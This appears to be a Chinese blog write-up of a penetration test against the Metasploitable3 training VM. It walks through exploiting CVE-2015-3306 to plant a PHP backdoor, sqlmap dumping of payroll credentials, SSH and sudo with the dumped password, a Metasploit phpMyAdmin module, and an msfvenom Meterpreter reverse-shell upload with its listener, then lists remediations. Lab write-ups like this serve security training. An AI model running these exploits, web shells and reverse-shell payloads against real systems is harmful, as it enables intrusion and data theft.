Metasploitable3渗透测试实战

最新推荐文章于 2024-05-17 01:18:41 发布
最新推荐文章于 2024-05-17 01:18:41 发布
阅读量4.1k 收藏 26
点赞数 2
分类专栏: web渗透测试与代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/113834231
版权

这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二

目录

1综述

经过演习指挥部授权,团队于2020年1月14日,对XXXXXX单位进行了渗透评估,通过模拟真实网络攻击行为,评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小,为制定相应的安全措施与解决方案提供实际的依据。
渗透结果总结汇总如下表:
在这里插入图片描述

2.渗透过程

2.1渗透路径说明

2.1.1全端口扫描/服务发现

在这里插入图片描述

2.1.2目录扫描

在这里插入图片描述

2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。

根据版本可以知道目标网站存在CVE-2015-3306 漏洞
exp下载地址:https://github.com/t0kx/exploit-CVE-2015-3306
1.使用git clone https://github.com/t0kx/exploit-CVE-2015-3306将exp下载到本地
在这里插入图片描述

2.执行python3 exploit.py --host 192.168.44.138 --port 21 --path "/var/www/html"运行检测脚本
在这里插入图片描述

访问http://192.168.44.138/backdoor.php?cmd=id

可以看到成功执行了命令
在这里插入图片描述

2.1.4二、sql注入

在http://192.168.44.138/payroll_app.php登录时抓包发送到burp爆破模块
在这里插入图片描述

将用户名设为暴破变量
在这里插入图片描述

可以发现目标网站对payload进行了执行处理,可以推断该处存在sql注入漏洞
在这里插入图片描述

将数据包存在post.txt文件中,使用sqlmap进行测试
sqlmap -r post.txt -p “user” -dbs 可以得到数据库名称
在这里插入图片描述

3.依次可以得到表和字段名称,最后使用命令
sqlmap -r post.txt -p “user” -D payroll -T users -C first_name,last_name,password --dump
得到数据库中存储的用户名密码
在这里插入图片描述

2.1.5三、phpmyadmin远程php代码执行

1.用数据库中得到的用户名密码 leia_organa help_me_obiwan 登录ssh
ssh leia_organa@192.168.4.138
在这里插入图片描述

2.sudo -s 提升到管理员权限
在这里插入图片描述

寻找 payroll相关的源代码文件 find / -name “payroll
在这里插入图片描述

4.查看/var/www/html/payroll_app.php文件,可以看到数据库账户密码
在这里插入图片描述

5.使用账户密码可以进入phpMyAdmin后台,查看版本
在这里插入图片描述

6.在MSF中依次执行
search phpmyadmin 3.5.8
use multi/http/phpmyadmin_preg_replace
set password sploitme
在这里插入图片描述

成功连接到目标服务器

2.1.6四、文件上传漏洞

1.针对目录扫描出来的路http://192.168.44.138:80/uploads/
利用msf中的工具进行上传生成payload (默认路径是在home下)
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.44.149 LPORT=6666 -f raw >demon.php
在这里插入图片描述

2.上传payload
davtest -url http://192.168.44.138:80/uploads/ -uploadfile demon.php -uploadloc DavTestDir_F7umGStRba9ZCw/6666.php
在这里插入图片描述

3.使用侦听模块
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.44.149
set LPORT 6666
在这里插入图片描述

成功连接目标服务器

2.2渗透成果说明

2.2.1

在这里插入图片描述

2.3存在问题

1.ProFTPD中使用的mod_copy模块存在未授权访问风险,导致ProFTPD自带的命令 SITE CPFR 和 SITE CPTO 可在未登录ftp的情况被外部黑客所利用,对系统文件进行任意复制。
2.在与数据库交互的地方并未作出安全的过滤,导致参数被数据库当成命令执行,威胁到服务器数据安全。
3.采用的phpmyadmin组件有版本漏洞,容易被攻击者进行利用。
4.对文件上传目录并没有进行权限管理,未登录就可以访问该目录,并未对可以上传的内容与用户做出限定,并且该目录有可执行权限。

2.4整改建议

1.针对于ProFTPD与phpmyadmin中出现的问题建议将该组件更新为最高版本或到官方网站及时更新补丁。
2.针对sql注入,建议完善输入检查,采用白名单的方式对输入进行过滤,并将输入内容进行转义,参数化处理。
3.针对文件上传问题,对url采用防回溯处理,采用open_basedir限制用户访问范围,对文件上传路径进行访问限制,将上传的文件进行改名,并只给予该文件夹可读取权限。

温柔小薛
关注
  • 2
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
metasploitable3 第一个flag, King of Diamond
avasy的博客
02-01 2937
nmap扫描对应的端口 192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 用浏览器访问一下 打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息 从phpinfo中我们得到以下有关靶机的信息 靶机系统版本: Windows NT METASPLOITABLE3 6....
metasploitable3:从入门到。。。。。。
lm19770429的专栏
05-15 4603
metasploit2中太容易拿漏洞,ms-080_67
cve-2015-3306复现
Yale的博客
04-02 3195
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)_msf6怎么用(1)
最新发布
2401_84302507的博客
05-17 451
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
metasploitable3-master.zip
03-02
github下载地址:https://github.com/rapid7/metasploitable3 提供csdn下载地址主要为方便国内朋友应急使用,毕竟这150M文件以github下载速度也够喝一壶的。
propane:利用 proftpd 中的任意文件写入错误 (CVE-2015-3306) 尝试执行代码
07-22
丙烷 利用 ProFTPD 的 mod_copy 模块 (CVE-2015-3306) 中的任意文件写入错误并尝试执行代码。
metasploitable2--简介--漏洞利用
weixin_45018333的博客
03-16 7233
1.metasploitable是用于评估metasploit的靶机。 2.metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 3.闲聊一句:原来觉得搭建环境是很没有必要的,应该拿实际的网络去练习,但是结果就是很久没找到目标而且还不是一个很好的行为。就很懒得去搭建,太麻烦,但是现在忽然明白...
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
Metasploitable 3
05-24
https://www.loop0day.site/2019/05/24/国内环境搭建Metasploitable-3靶机/
metaspoit-frame master
11-04
需要自己在Linux段进行编译
Metapolitable3 攻防课题
02-10
针对 Metasploitable 3 的渗透测试,让 Metasploitable 3 更加难以被攻破!对的,这两位小哥给自己设计的靶机系统加上了防火墙…他们解释到 Metasploitable 3 内置一些安全机制,比如防火墙,权限设置等。此外,Metasploitable 3中有些漏洞在 Metasploit 中并没有漏洞利用模块,需要测试人员自己挖掘。但是还没完,为了让Metasploitable 3 更加有趣,这两位小哥往里面加入了 flag。这样大家就可以在里面开开心心的玩 CTF 啦!
metasploitable3Metasploitable3是从头开始构建的VM,具有大量安全漏洞
02-09
Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。 它旨在用作测试漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。 有关更多详细信息,请参见复制。 快速开始 要使用提供的预构建图像,创建一个新的本地metasploitable工作区: Linux用户: mkdir metasploitable3-workspace cd metasploitable3-workspace curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile && vagrant up Windows用户: mkdir metasploitable3-workspace cd metasploitable3-workspa
ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞
weixin_33738578的博客
01-24 636
poc如下: #!/usr/bin/env python# coding=utf-8"""Site: http://www.beebeeto.com/Framework: https://github.com/n0tr00t/Beebeeto-framework"""import randomimport telnetlibfrom baseframe import BaseFramefrom ...
安装metasploitable3的经验总结
weixin_33691700的博客
06-27 3278
一个月没有写学习记录了,但是这一个月一直没闲着,抽空写写自己装metasploitable3的经验教训(提示:只要你的环境配置没错,步骤没错,多试几次就会成功了,我总共测试了15次,,短的耗时30分钟,长的3个小时以上。失败激起了我的好胜心,终于在今天凌晨5点大家还在睡觉的时候突然成功了,瞬间不困了,嘿嘿) 最近两天在win10系统下装metasploitable3,两天尝试了各种方法,总结如下...
Metasploitable3 安装总结
热门推荐
我,我的博客
09-17 1万+
一个metasploitable3的测试环境搭建了两天,遇到了各种问题,简单的坐下总结: 物理机:kali linux 2018.2  虚拟机vmware,virtual box (个人倾向于vmware,但是迫于本次实验,安装了 virtualbox) 参考链接:Metasploit3 Git链接 1.软件的选择:      packer,virtualbox,vmware等安装基本没有...
安装Metasploitable 3
独行者103的专栏
03-01 1万+
相比于Metasploitable 2,Metasploitable 3更加注重对渗透能力的搭建和分析。 我改了以下内容: Autoattend.xml &lt;!-- Do not uncomment the Key element if you are using trial ISOs --&gt; &lt;!-- You must uncomment the Key element...
Metaspolit工具详解
Ping_Pig的博客
10-10 7624
MSF简介: MSF(Metaspolit Framework)是一个开源工具,由Ruby语言编写的模板化框架,具有很好的扩展性. 在这里示例以kali操作系统为基础 kali上启动命令: systemctl start postgresql(开启数据库服务) msfconsole(启动msf服务) MSF基础 MSF由多个模块组成: Auxiliaries:辅助模块 Ex...
metasploitable3攻略
05-12
Metasploitable3是一个虚拟的漏洞测试环境,它是用于漏洞测试和渗透测试的。以下是攻击Metasploitable3的一些基本步骤: 1. 首先,你需要安装Metasploitable3虚拟机。你可以从GitHub上下载它的ISO文件。 2. 安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值